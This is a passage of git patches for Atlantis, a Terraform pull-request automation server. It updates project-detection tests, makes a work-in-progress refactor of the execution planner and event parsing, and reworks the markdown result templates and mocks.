 	var err error
 	nestedModules1, err = ioutil.TempDir("", "")
-	Ok(t, err)
 	err = os.MkdirAll(filepath.Join(nestedModules1, "project1/modules"), 0700)
 	Ok(t, err)
-	_, err = os.Create(filepath.Join(nestedModules1, "project1/main.tf"))
-	Ok(t, err)
-	_, err = os.Create(filepath.Join(nestedModules1, "project1/modules/main.tf"))
-	Ok(t, err)
+	files := []string{
+		"non-tf",
+		"terraform.tfstate.backup",
+		"project1/main.tf",
+		"project1/terraform.tfstate",
+		"project1/terraform.tfstate.backup",
+		"project1/modules/main.tf",
+	}
+	for _, f := range files {
+		_, err = os.Create(filepath.Join(nestedModules1, f))
+		Ok(t, err)
+	}
 
 	// 2. Nested modules dir inside top-level project
 	// main.tf
@@ -71,6 +84,20 @@ func setupTmpRepos(t *testing.T) {
 		_, err = os.Create(filepath.Join(topLevelModules, path, "main.tf"))
 		Ok(t, err)
 	}
+
+	// 4. Env/ dir
+	// main.tf
+	// env/
+	//   staging.tfvars
+	//   production.tfvars
+	envDir, err = ioutil.TempDir("", "")
+	Ok(t, err)
+	err = os.MkdirAll(filepath.Join(envDir, "env"), 0700)
+	Ok(t, err)
+	_, err = os.Create(filepath.Join(envDir, "env/staging.tfvars"))
+	Ok(t, err)
+	_, err = os.Create(filepath.Join(envDir, "env/production.tfvars"))
+	Ok(t, err)
 }
 
 func TestDetermineProjects(t *testing.T) {
@@ -86,13 +113,13 @@ func TestDetermineProjects(t *testing.T) {
 			"If no files were modified then should return an empty list",
 			nil,
 			nil,
-			"",
+			nestedModules1,
 		},
 		{
 			"Should ignore non .tf files and return an empty list",
 			[]string{"non-tf"},
 			nil,
-			"",
+			nestedModules1,
 		},
 		{
 			"Should plan in the parent directory from modules if that dir has a main.tf",
@@ -128,65 +155,66 @@ func TestDetermineProjects(t *testing.T) {
 			"Should ignore tfstate files and return an empty list",
 			[]string{"terraform.tfstate", "terraform.tfstate.backup", "parent/terraform.tfstate", "parent/terraform.tfstate.backup"},
 			nil,
-			"",
-		},
-		{
-			"Should ignore tfstate files and return an empty list",
-			[]string{"terraform.tfstate", "terraform.tfstate.backup", "parent/terraform.tfstate", "parent/terraform.tfstate.backup"},
-			nil,
-			"",
+			nestedModules1,
 		},
 		{
 			"Should return '.' when changed file is at root",
 			[]string{"a.tf"},
 			[]string{"."},
-			"",
+			nestedModules2,
 		},
 		{
 			"Should return directory when changed file is in a dir",
-			[]string{"parent/a.tf"},
-			[]string{"parent"},
-			"",
+			[]string{"project1/a.tf"},
+			[]string{"project1"},
+			nestedModules1,
 		},
 		{
 			"Should return parent dir when changed file is in an env/ dir",
-			[]string{"env/a.tfvars"},
+			[]string{"env/staging.tfvars"},
 			[]string{"."},
-			"",
+			envDir,
 		},
 		{
 			"Should de-duplicate when multiple files changed in the same dir",
-			[]string{"root.tf", "env/env.tfvars", "parent/parent.tf", "parent/parent2.tf", "parent/child/child.tf", "parent/child/env/env.tfvars"},
-			[]string{".", "parent", "parent/child"},
+			[]string{"env/staging.tfvars", "main.tf", "other.tf"},
+			[]string{"."},
+			"",
+		},
+		{
+			"Should ignore changes in a dir that was deleted",
+			[]string{"wasdeleted/main.tf"},
+			[]string{},
 			"",
 		},
 	}
 	for _, c := range cases {
-		t.Log(c.description)
-		projects := m.DetermineProjects(noopLogger, c.files, modifiedRepo, c.repoDir)
+		t.Run(c.description, func(t *testing.T) {
+			projects := m.DetermineProjects(noopLogger, c.files, modifiedRepo, c.repoDir)
 
-		// Extract the paths from the projects. We use a slice here instead of a
-		// map so we can test whether there are duplicates returned.
-		var paths []string
-		for _, project := range projects {
-			paths = append(paths, project.Path)
-			// Check that the project object has the repo set properly.
-			Equals(t, modifiedRepo, project.RepoFullName)
-		}
-		Assert(t, len(c.expProjectPaths) == len(paths),
-			"exp %d paths but found %d. They were %v", len(c.expProjectPaths), len(paths), paths)
+			// Extract the paths from the projects. We use a slice here instead of a
+			// map so we can test whether there are duplicates returned.
+			var paths []string
+			for _, project := range projects {
+				paths = append(paths, project.Path)
+				// Check that the project object has the repo set properly.
+				Equals(t, modifiedRepo, project.RepoFullName)
+			}
+			Assert(t, len(c.expProjectPaths) == len(paths),
+				"exp %q but found %q", c.expProjectPaths, paths)
 
-		for _, expPath := range c.expProjectPaths {
-			found := false
-			for _, actPath := range paths {
-				if expPath == actPath {
-					found = true
-					break
+			for _, expPath := range c.expProjectPaths {
+				found := false
+				for _, actPath := range paths {
+					if expPath == actPath {
+						found = true
+						break
+					}
+				}
+				if !found {
+					t.Fatalf("exp %q but was not in paths %v", expPath, paths)
 				}
 			}
-			if !found {
-				t.Fatalf("exp %q but was not in paths %v", expPath, paths)
-			}
-		}
+		})
 	}
 }

From 3525ab3bd9d9858309a4b357482d39fca4ea9d09 Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Tue, 12 Jun 2018 14:54:38 +0100
Subject: [PATCH 18/69] WIP

---
 CHANGELOG.md                              |  14 +
 server/events/apply_executor.go           |   3 +-
 server/events/command_context.go          |   4 +-
 server/events/command_handler.go          |   2 -
 server/events/comment_parser.go           |   2 +-
 server/events/event_parser.go             |  26 +-
 server/events/event_parser_test.go        |  10 +-
 server/events/execution_planner.go        |  69 +--
 server/events/execution_planner_test.go   |  13 +-
 server/events/markdown_renderer.go        |  48 +-
 server/events/mocks/mock_event_parsing.go |  14 +-
 server/events/models/models.go            |   5 +
 server/events/plan_executor.go            |  72 ++-
 server/events/plan_executor_test.go       | 547 +++++++++++-----------
 server/events/project_result.go           |   1 +
 server/events/runtime/repoconfig.go       |   8 +-
 server/events/yaml/project.go             |  14 +-
 server/events_controller.go               |  99 +++-
 server/server.go                          |   6 +-
 19 files changed, 553 insertions(+), 404 deletions(-)

diff --git a/CHANGELOG.md b/CHANGELOG.md
index 776ab26210..fc99816502 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -1,3 +1,17 @@
+# v0.4.0-alpha
+
+## Features
+
+## Bugfixes
+* Won't attempt to run plan in a directory that was deleted.
+
+## Backwards Incompatibilities / Notes:
+
+## Downloads
+
+## Docker
+
+
 # v0.3.10
 
 ## Features
diff --git a/server/events/apply_executor.go b/server/events/apply_executor.go
index dbacf35a64..260a7fffa0 100644
--- a/server/events/apply_executor.go
+++ b/server/events/apply_executor.go
@@ -16,7 +16,6 @@ package events
 import (
 	"github.com/runatlantis/atlantis/server/events/models"
 	"github.com/runatlantis/atlantis/server/events/run"
-	"github.com/runatlantis/atlantis/server/events/runtime"
 	"github.com/runatlantis/atlantis/server/events/terraform"
 	"github.com/runatlantis/atlantis/server/events/vcs"
 	"github.com/runatlantis/atlantis/server/events/webhooks"
@@ -31,7 +30,7 @@ type ApplyExecutor struct {
 	AtlantisWorkspace AtlantisWorkspace
 	ProjectLocker     *DefaultProjectLocker
 	Webhooks          webhooks.Sender
-	ExecutionPlanner  *runtime.ExecutionPlanner
+	ExecutionPlanner  *ExecutionPlanner
 }
 
 // Execute executes apply for the ctx.
diff --git a/server/events/command_context.go b/server/events/command_context.go
index 35a2a1b141..f986e43cc3 100644
--- a/server/events/command_context.go
+++ b/server/events/command_context.go
@@ -18,8 +18,8 @@ import (
 	"github.com/runatlantis/atlantis/server/logging"
 )
 
-// CommandContext represents the context of a command that came from a comment
-// on a pull request.
+// CommandContext represents the context of a command that should be executed
+// for a pull request.
 type CommandContext struct {
 	// BaseRepo is the repository that the pull request will be merged into.
 	BaseRepo models.Repo
diff --git a/server/events/command_handler.go b/server/events/command_handler.go
index 047d5f936a..54c0ffa47f 100644
--- a/server/events/command_handler.go
+++ b/server/events/command_handler.go
@@ -137,8 +137,6 @@ func (c *CommandHandler) buildLogger(repoFullName string, pullNum int) *logging.
 }
 
 func (c *CommandHandler) run(ctx *CommandContext) {
-	log := c.buildLogger(ctx.BaseRepo.FullName, ctx.Pull.Num)
-	ctx.Log = log
 	defer c.logPanics(ctx)
 
 	if !c.AllowForkPRs && ctx.HeadRepo.Owner != ctx.BaseRepo.Owner {
diff --git a/server/events/comment_parser.go b/server/events/comment_parser.go
index 2c9e1b0c1b..69e845197a 100644
--- a/server/events/comment_parser.go
+++ b/server/events/comment_parser.go
@@ -199,7 +199,7 @@ func (e *CommentParser) Parse(comment string, vcsHost models.VCSHostType) Commen
 	}
 
 	return CommentParseResult{
-		Command: NewCommand(dir, extraArgs, name, verbose, workspace),
+		Command: NewCommand(dir, extraArgs, name, verbose, workspace, false),
 	}
 }
 
diff --git a/server/events/event_parser.go b/server/events/event_parser.go
index cd3e36f5b3..742a765a99 100644
--- a/server/events/event_parser.go
+++ b/server/events/event_parser.go
@@ -42,10 +42,13 @@ type Command struct {
 	Name      CommandName
 	Verbose   bool
 	Workspace string
+	// Autoplan is true if the command is a plan command being executed in an
+	// attempt to automatically run plan.
+	Autoplan bool
 }
 
 // NewCommand constructs a Command, setting all missing fields to defaults.
-func NewCommand(dir string, flags []string, name CommandName, verbose bool, workspace string) *Command {
+func NewCommand(dir string, flags []string, name CommandName, verbose bool, workspace string, autoplan bool) *Command {
 	// If dir was an empty string, this will return '.'.
 	validDir := path.Clean(dir)
 	if validDir == "/" {
@@ -60,14 +63,17 @@ func NewCommand(dir string, flags []string, name CommandName, verbose bool, work
 		Name:      name,
 		Verbose:   verbose,
 		Workspace: workspace,
+		Autoplan:  autoplan,
 	}
 }
 
 type EventParsing interface {
 	ParseGithubIssueCommentEvent(comment *github.IssueCommentEvent) (baseRepo models.Repo, user models.User, pullNum int, err error)
+	// ParseGithubPull returns the pull request and head repo.
 	ParseGithubPull(pull *github.PullRequest) (models.PullRequest, models.Repo, error)
 	ParseGithubRepo(ghRepo *github.Repository) (models.Repo, error)
-	ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.PullRequest, models.Repo, error)
+	// ParseGitlabMergeEvent returns the pull request, base repo and head repo.
+	ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.PullRequest, models.Repo, models.Repo, error)
 	ParseGitlabMergeCommentEvent(event gitlab.MergeCommentEvent) (baseRepo models.Repo, headRepo models.Repo, user models.User, err error)
 	ParseGitlabMergeRequest(mr *gitlab.MergeRequest, baseRepo models.Repo) models.PullRequest
 }
@@ -154,7 +160,7 @@ func (e *EventParser) ParseGithubRepo(ghRepo *github.Repository) (models.Repo, e
 	return models.NewRepo(models.Github, ghRepo.GetFullName(), ghRepo.GetCloneURL(), e.GithubUser, e.GithubToken)
 }
 
-func (e *EventParser) ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.PullRequest, models.Repo, error) {
+func (e *EventParser) ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.PullRequest, models.Repo, models.Repo, error) {
 	modelState := models.Closed
 	if event.ObjectAttributes.State == gitlabPullOpened {
 		modelState = models.Open
@@ -162,7 +168,15 @@ func (e *EventParser) ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.Pul
 	// GitLab also has a "merged" state, but we map that to Closed so we don't
 	// need to check for it.
 
-	repo, err := models.NewRepo(models.Gitlab, event.Project.PathWithNamespace, event.Project.GitHTTPURL, e.GitlabUser, e.GitlabToken)
+	baseRepo, err := models.NewRepo(models.Gitlab, event.Project.PathWithNamespace, event.Project.GitHTTPURL, e.GitlabUser, e.GitlabToken)
+	if err != nil {
+		return models.PullRequest{}, models.Repo{}, models.Repo{}, err
+	}
+	headRepo, err := models.NewRepo(models.Gitlab, event.ObjectAttributes.Source.PathWithNamespace, event.ObjectAttributes.Source.GitHTTPURL, e.GitlabUser, e.GitlabToken)
+	if err != nil {
+		return models.PullRequest{}, models.Repo{}, models.Repo{}, err
+	}
+
 	pull := models.PullRequest{
 		URL:        event.ObjectAttributes.URL,
 		Author:     event.User.Username,
@@ -170,10 +184,10 @@ func (e *EventParser) ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.Pul
 		HeadCommit: event.ObjectAttributes.LastCommit.ID,
 		Branch:     event.ObjectAttributes.SourceBranch,
 		State:      modelState,
-		BaseRepo:   repo,
+		BaseRepo:   baseRepo,
 	}
 
-	return pull, repo, err
+	return pull, baseRepo, headRepo, err
 }
 
 // ParseGitlabMergeCommentEvent creates Atlantis models out of a GitLab event.
diff --git a/server/events/event_parser_test.go b/server/events/event_parser_test.go
index dbd4b515e4..2e9b7e4346 100644
--- a/server/events/event_parser_test.go
+++ b/server/events/event_parser_test.go
@@ -156,7 +156,7 @@ func TestParseGitlabMergeEvent(t *testing.T) {
 	var event *gitlab.MergeEvent
 	err := json.Unmarshal([]byte(mergeEventJSON), &event)
 	Ok(t, err)
-	pull, repo, err := parser.ParseGitlabMergeEvent(*event)
+	pull, repo, _, err := parser.ParseGitlabMergeEvent(*event)
 	Ok(t, err)
 
 	expRepo := models.Repo{
@@ -185,7 +185,7 @@ func TestParseGitlabMergeEvent(t *testing.T) {
 
 	t.Log("If the state is closed, should set field correctly.")
 	event.ObjectAttributes.State = "closed"
-	pull, _, err = parser.ParseGitlabMergeEvent(*event)
+	pull, _, _, err = parser.ParseGitlabMergeEvent(*event)
 	Ok(t, err)
 	Equals(t, models.Closed, pull.State)
 }
@@ -283,19 +283,19 @@ func TestNewCommand_CleansDir(t *testing.T) {
 
 	for _, c := range cases {
 		t.Run(c.Dir, func(t *testing.T) {
-			cmd := events.NewCommand(c.Dir, nil, events.Plan, false, "workspace")
+			cmd := events.NewCommand(c.Dir, nil, events.Plan, false, "workspace", false)
 			Equals(t, c.ExpDir, cmd.Dir)
 		})
 	}
 }
 
 func TestNewCommand_EmptyWorkspace(t *testing.T) {
-	cmd := events.NewCommand("dir", nil, events.Plan, false, "")
+	cmd := events.NewCommand("dir", nil, events.Plan, false, "", false)
 	Equals(t, "default", cmd.Workspace)
 }
 
 func TestNewCommand_AllFieldsSet(t *testing.T) {
-	cmd := events.NewCommand("dir", []string{"a", "b"}, events.Plan, true, "workspace")
+	cmd := events.NewCommand("dir", []string{"a", "b"}, events.Plan, true, "workspace", false)
 	Equals(t, events.Command{
 		Workspace: "workspace",
 		Dir:       "dir",
diff --git a/server/events/execution_planner.go b/server/events/execution_planner.go
index eee10f5890..e6e928c24b 100644
--- a/server/events/execution_planner.go
+++ b/server/events/execution_planner.go
@@ -1,4 +1,4 @@
-package runtime
+package events
 
 import (
 	"fmt"
@@ -6,7 +6,8 @@ import (
 	"path/filepath"
 
 	"github.com/hashicorp/go-version"
-	"github.com/runatlantis/atlantis/server/events"
+	"github.com/runatlantis/atlantis/server/events/models"
+	"github.com/runatlantis/atlantis/server/events/runtime"
 	"github.com/runatlantis/atlantis/server/events/yaml"
 	"github.com/runatlantis/atlantis/server/logging"
 )
@@ -19,25 +20,27 @@ type ExecutionPlanner struct {
 	TerraformExecutor TerraformExec
 	DefaultTFVersion  *version.Version
 	ParserValidator   *yaml.ParserValidator
-	ProjectFinder     events.ProjectFinder
+	ProjectFinder     ProjectFinder
 }
 
 type TerraformExec interface {
 	RunCommandWithVersion(log *logging.SimpleLogger, path string, args []string, v *version.Version, workspace string) (string, error)
 }
 
-func (s *ExecutionPlanner) BuildPlanStage(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) (PlanStage, error) {
+func (s *ExecutionPlanner) BuildPlanStage(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) (runtime.PlanStage, error) {
 	defaults := s.defaultPlanSteps(log, repoDir, workspace, relProjectPath, extraCommentArgs, username)
 	steps, err := s.buildStage(PlanStageName, log, repoDir, workspace, relProjectPath, extraCommentArgs, username, defaults)
 	if err != nil {
-		return nil, err
+		return runtime.PlanStage{}, err
 	}
-	return &PlanStage{
-		Steps: steps,
+	return runtime.PlanStage{
+		Steps:       steps,
+		Workspace:   workspace,
+		ProjectPath: relProjectPath,
 	}, nil
 }
 
-func (s *ExecutionPlanner) BuildAutoplanStages(log *logging.SimpleLogger, repoFullName string, repoDir string, username string, modifiedFiles []string) ([]PlanStage, error) {
+func (s *ExecutionPlanner) BuildAutoplanStages(log *logging.SimpleLogger, repoFullName string, repoDir string, username string, modifiedFiles []string) ([]runtime.PlanStage, error) {
 	// If there is an atlantis.yaml
 	// -> Get modified files from pull request.
 	// -> For each project, if autoplan == true && files match
@@ -54,21 +57,23 @@ func (s *ExecutionPlanner) BuildAutoplanStages(log *logging.SimpleLogger, repoFu
 	// was modified in the pull request.
 	if os.IsNotExist(err) {
 		projects := s.ProjectFinder.DetermineProjects(log, modifiedFiles, repoFullName, repoDir)
-		var stages []PlanStage
+		var stages []runtime.PlanStage
 		for _, p := range projects {
 			// NOTE: we use the default workspace because we don't know about
 			// other workspaces. If users want to plan for other workspaces they
 			// need to use a config file.
-			steps := s.defaultPlanSteps(log, repoDir, defaultWorkspace, p.Path, nil, username)
-			stages = append(stages, PlanStage{
-				Steps: steps,
+			steps := s.defaultPlanSteps(log, repoDir, models.DefaultWorkspace, p.Path, nil, username)
+			stages = append(stages, runtime.PlanStage{
+				Steps:       steps,
+				Workspace:   models.DefaultWorkspace,
+				ProjectPath: p.Path,
 			})
 		}
 		return stages, nil
 	}
 
 	// Else we run plan according to the config file.
-	var stages []PlanStage
+	var stages []runtime.PlanStage
 	for _, p := range config.Projects {
 		if s.shouldAutoplan(p.AutoPlan, modifiedFiles) {
 			// todo
@@ -79,25 +84,25 @@ func (s *ExecutionPlanner) BuildAutoplanStages(log *logging.SimpleLogger, repoFu
 }
 
 func (s *ExecutionPlanner) shouldAutoplan(autoplan yaml.AutoPlan, modifiedFiles []string) bool {
-
+	return true
 }
 
 func (s *ExecutionPlanner) getSteps() {
 
 }
 
-func (s *ExecutionPlanner) BuildApplyStage(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) (*ApplyStage, error) {
+func (s *ExecutionPlanner) BuildApplyStage(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) (*runtime.ApplyStage, error) {
 	defaults := s.defaultApplySteps(log, repoDir, workspace, relProjectPath, extraCommentArgs, username)
 	steps, err := s.buildStage(ApplyStageName, log, repoDir, workspace, relProjectPath, extraCommentArgs, username, defaults)
 	if err != nil {
 		return nil, err
 	}
-	return &ApplyStage{
+	return &runtime.ApplyStage{
 		Steps: steps,
 	}, nil
 }
 
-func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string, defaults []Step) ([]Step, error) {
+func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string, defaults []runtime.Step) ([]runtime.Step, error) {
 	config, err := s.ParserValidator.ReadConfig(repoDir)
 
 	// If there's no config file, use defaults.
@@ -129,7 +134,7 @@ func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogge
 
 			// We have a workflow defined, so now we need to build it.
 			meta := s.buildMeta(log, repoDir, workspace, relProjectPath, extraCommentArgs, username)
-			var steps []Step
+			var steps []runtime.Step
 			var stepsConfig []yaml.StepConfig
 			if stageName == PlanStageName {
 				stepsConfig = workflow.Plan.Steps
@@ -137,25 +142,25 @@ func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogge
 				stepsConfig = workflow.Apply.Steps
 			}
 			for _, stepConfig := range stepsConfig {
-				var step Step
+				var step runtime.Step
 				switch stepConfig.StepType {
 				case "init":
-					step = &InitStep{
+					step = &runtime.InitStep{
 						Meta:      meta,
 						ExtraArgs: stepConfig.ExtraArgs,
 					}
 				case "plan":
-					step = &PlanStep{
+					step = &runtime.PlanStep{
 						Meta:      meta,
 						ExtraArgs: stepConfig.ExtraArgs,
 					}
 				case "apply":
-					step = &ApplyStep{
+					step = &runtime.ApplyStep{
 						Meta:      meta,
 						ExtraArgs: stepConfig.ExtraArgs,
 					}
 				case "run":
-					step = &RunStep{
+					step = &runtime.RunStep{
 						Meta:     meta,
 						Commands: stepConfig.Run,
 					}
@@ -170,8 +175,8 @@ func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogge
 	return defaults, nil
 }
 
-func (s *ExecutionPlanner) buildMeta(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) StepMeta {
-	return StepMeta{
+func (s *ExecutionPlanner) buildMeta(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) runtime.StepMeta {
+	return runtime.StepMeta{
 		Log:                   log,
 		Workspace:             workspace,
 		AbsolutePath:          filepath.Join(repoDir, relProjectPath),
@@ -184,23 +189,23 @@ func (s *ExecutionPlanner) buildMeta(log *logging.SimpleLogger, repoDir string,
 	}
 }
 
-func (s *ExecutionPlanner) defaultPlanSteps(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) []Step {
+func (s *ExecutionPlanner) defaultPlanSteps(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) []runtime.Step {
 	meta := s.buildMeta(log, repoDir, workspace, relProjectPath, extraCommentArgs, username)
-	return []Step{
-		&InitStep{
+	return []runtime.Step{
+		&runtime.InitStep{
 			ExtraArgs: nil,
 			Meta:      meta,
 		},
-		&PlanStep{
+		&runtime.PlanStep{
 			ExtraArgs: nil,
 			Meta:      meta,
 		},
 	}
 }
-func (s *ExecutionPlanner) defaultApplySteps(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) []Step {
+func (s *ExecutionPlanner) defaultApplySteps(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) []runtime.Step {
 	meta := s.buildMeta(log, repoDir, workspace, relProjectPath, extraCommentArgs, username)
-	return []Step{
-		&ApplyStep{
+	return []runtime.Step{
+		&runtime.ApplyStep{
 			ExtraArgs: nil,
 			Meta:      meta,
 		},
diff --git a/server/events/execution_planner_test.go b/server/events/execution_planner_test.go
index 9c3fd5ac4d..7b6fc7ac97 100644
--- a/server/events/execution_planner_test.go
+++ b/server/events/execution_planner_test.go
@@ -1,4 +1,4 @@
-package runtime_test
+package events_test
 
 import (
 	"io/ioutil"
@@ -6,6 +6,7 @@ import (
 	"testing"
 
 	"github.com/hashicorp/go-version"
+	"github.com/runatlantis/atlantis/server/events"
 	"github.com/runatlantis/atlantis/server/events/runtime"
 	"github.com/runatlantis/atlantis/server/logging"
 	. "github.com/runatlantis/atlantis/testing"
@@ -15,7 +16,7 @@ import (
 func TestBuildStage_NoConfigFile(t *testing.T) {
 	var defaultTFVersion *version.Version
 	var terraformExecutor runtime.TerraformExec
-	e := runtime.ExecutionPlanner{
+	e := events.ExecutionPlanner{
 		DefaultTFVersion:  defaultTFVersion,
 		TerraformExecutor: terraformExecutor,
 	}
@@ -50,7 +51,7 @@ func TestBuildStage_NoConfigFile(t *testing.T) {
 					Meta: meta,
 				},
 			},
-		}, *planStage)
+		}, planStage)
 	})
 
 	// Then the apply stage.
@@ -70,7 +71,7 @@ func TestBuildStage_NoConfigFile(t *testing.T) {
 func TestBuildStage(t *testing.T) {
 	var defaultTFVersion *version.Version
 	var terraformExecutor runtime.TerraformExec
-	e := runtime.ExecutionPlanner{
+	e := events.ExecutionPlanner{
 		DefaultTFVersion:  defaultTFVersion,
 		TerraformExecutor: terraformExecutor,
 	}
@@ -131,7 +132,7 @@ workflows:
 					Meta: meta,
 				},
 			},
-		}, *planStage)
+		}, planStage)
 	})
 
 	t.Run("apply stage for project without config", func(t *testing.T) {
@@ -171,7 +172,7 @@ workflows:
 					Commands: []string{"echo", "hi"},
 				},
 			},
-		}, *planStage)
+		}, planStage)
 	})
 
 	t.Run("apply stage for custom config", func(t *testing.T) {
diff --git a/server/events/markdown_renderer.go b/server/events/markdown_renderer.go
index 978cc7776a..f91a45a1f1 100644
--- a/server/events/markdown_renderer.go
+++ b/server/events/markdown_renderer.go
@@ -18,6 +18,8 @@ import (
 	"fmt"
 	"strings"
 	"text/template"
+
+	"github.com/Masterminds/sprig"
 )
 
 // MarkdownRenderer renders responses as markdown.
@@ -44,10 +46,16 @@ type FailureData struct {
 
 // ResultData is data about a successful response.
 type ResultData struct {
-	Results map[string]string
+	Results []ProjectResultTmplData
 	CommonData
 }
 
+type ProjectResultTmplData struct {
+	Workspace string
+	Dir       string
+	Rendered  string
+}
+
 // Render formats the data into a markdown string.
 // nolint: interfacer
 func (m *MarkdownRenderer) Render(res CommandResponse, cmdName CommandName, log string, verbose bool) string {
@@ -63,10 +71,15 @@ func (m *MarkdownRenderer) Render(res CommandResponse, cmdName CommandName, log
 }
 
 func (m *MarkdownRenderer) renderProjectResults(pathResults []ProjectResult, common CommonData) string {
-	results := make(map[string]string)
+	var resultsTmplData []ProjectResultTmplData
+
 	for _, result := range pathResults {
+		resultData := ProjectResultTmplData{
+			Workspace: result.Workspace,
+			Dir:       result.Path,
+		}
 		if result.Error != nil {
-			results[result.Path] = m.renderTemplate(errTmpl, struct {
+			resultData.Rendered = m.renderTemplate(errTmpl, struct {
 				Command string
 				Error   string
 			}{
@@ -74,7 +87,7 @@ func (m *MarkdownRenderer) renderProjectResults(pathResults []ProjectResult, com
 				Error:   result.Error.Error(),
 			})
 		} else if result.Failure != "" {
-			results[result.Path] = m.renderTemplate(failureTmpl, struct {
+			resultData.Rendered = m.renderTemplate(failureTmpl, struct {
 				Command string
 				Failure string
 			}{
@@ -82,21 +95,22 @@ func (m *MarkdownRenderer) renderProjectResults(pathResults []ProjectResult, com
 				Failure: result.Failure,
 			})
 		} else if result.PlanSuccess != nil {
-			results[result.Path] = m.renderTemplate(planSuccessTmpl, *result.PlanSuccess)
+			resultData.Rendered = m.renderTemplate(planSuccessTmpl, *result.PlanSuccess)
 		} else if result.ApplySuccess != "" {
-			results[result.Path] = m.renderTemplate(applySuccessTmpl, struct{ Output string }{result.ApplySuccess})
+			resultData.Rendered = m.renderTemplate(applySuccessTmpl, struct{ Output string }{result.ApplySuccess})
 		} else {
-			results[result.Path] = "Found no template. This is a bug!"
+			resultData.Rendered = "Found no template. This is a bug!"
 		}
+		resultsTmplData = append(resultsTmplData, resultData)
 	}
 
 	var tmpl *template.Template
-	if len(results) == 1 {
+	if len(resultsTmplData) == 1 {
 		tmpl = singleProjectTmpl
 	} else {
 		tmpl = multiProjectTmpl
 	}
-	return m.renderTemplate(tmpl, ResultData{results, common})
+	return m.renderTemplate(tmpl, ResultData{resultsTmplData, common})
 }
 
 func (m *MarkdownRenderer) renderTemplate(tmpl *template.Template, data interface{}) string {
@@ -107,15 +121,15 @@ func (m *MarkdownRenderer) renderTemplate(tmpl *template.Template, data interfac
 	return buf.String()
 }
 
-var singleProjectTmpl = template.Must(template.New("").Parse("{{ range $result := .Results }}{{$result}}{{end}}\n" + logTmpl))
-var multiProjectTmpl = template.Must(template.New("").Parse(
-	"Ran {{.Command}} in {{ len .Results }} directories:\n" +
-		"{{ range $path, $result := .Results }}" +
-		" * `{{$path}}`\n" +
+var singleProjectTmpl = template.Must(template.New("").Parse("{{$result := index .Results 0}}Ran {{.Command}} in dir: `{{$result.Dir}}` workspace: `{{$result.Workspace}}`\n{{$result.Rendered}}\n" + logTmpl))
+var multiProjectTmpl = template.Must(template.New("").Funcs(sprig.TxtFuncMap()).Parse(
+	"Ran {{.Command}} for {{ len .Results }} projects:\n" +
+		"{{ range $result := .Results }}" +
+		"1. path: `{{$result.Dir}} workspace: `{{$result.Workspace}}`\n" +
 		"{{end}}\n" +
-		"{{ range $path, $result := .Results }}" +
-		"## {{$path}}/\n" +
-		"{{$result}}\n" +
+		"{{ range $i, $result := .Results }}" +
+		"### {{add $i 1}}. workspace: `{{$result.Workspace}}` path: `{{$result.Dir}}`\n" +
+		"{{$result.Rendered}}\n" +
 		"---\n{{end}}" +
 		logTmpl))
 var planSuccessTmpl = template.Must(template.New("").Parse(
diff --git a/server/events/mocks/mock_event_parsing.go b/server/events/mocks/mock_event_parsing.go
index e88b581dce..007f823a40 100644
--- a/server/events/mocks/mock_event_parsing.go
+++ b/server/events/mocks/mock_event_parsing.go
@@ -80,12 +80,13 @@ func (mock *MockEventParsing) ParseGithubRepo(ghRepo *github.Repository) (models
 	return ret0, ret1
 }
 
-func (mock *MockEventParsing) ParseGitlabMergeEvent(event go_gitlab.MergeEvent) (models.PullRequest, models.Repo, error) {
+func (mock *MockEventParsing) ParseGitlabMergeEvent(event go_gitlab.MergeEvent) (models.PullRequest, models.Repo, models.Repo, error) {
 	params := []pegomock.Param{event}
-	result := pegomock.GetGenericMockFrom(mock).Invoke("ParseGitlabMergeEvent", params, []reflect.Type{reflect.TypeOf((*models.PullRequest)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+	result := pegomock.GetGenericMockFrom(mock).Invoke("ParseGitlabMergeEvent", params, []reflect.Type{reflect.TypeOf((*models.PullRequest)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
 	var ret0 models.PullRequest
 	var ret1 models.Repo
-	var ret2 error
+	var ret2 models.Repo
+	var ret3 error
 	if len(result) != 0 {
 		if result[0] != nil {
 			ret0 = result[0].(models.PullRequest)
@@ -94,10 +95,13 @@ func (mock *MockEventParsing) ParseGitlabMergeEvent(event go_gitlab.MergeEvent)
 			ret1 = result[1].(models.Repo)
 		}
 		if result[2] != nil {
-			ret2 = result[2].(error)
+			ret2 = result[2].(models.Repo)
+		}
+		if result[3] != nil {
+			ret3 = result[3].(error)
 		}
 	}
-	return ret0, ret1, ret2
+	return ret0, ret1, ret2, ret3
 }
 
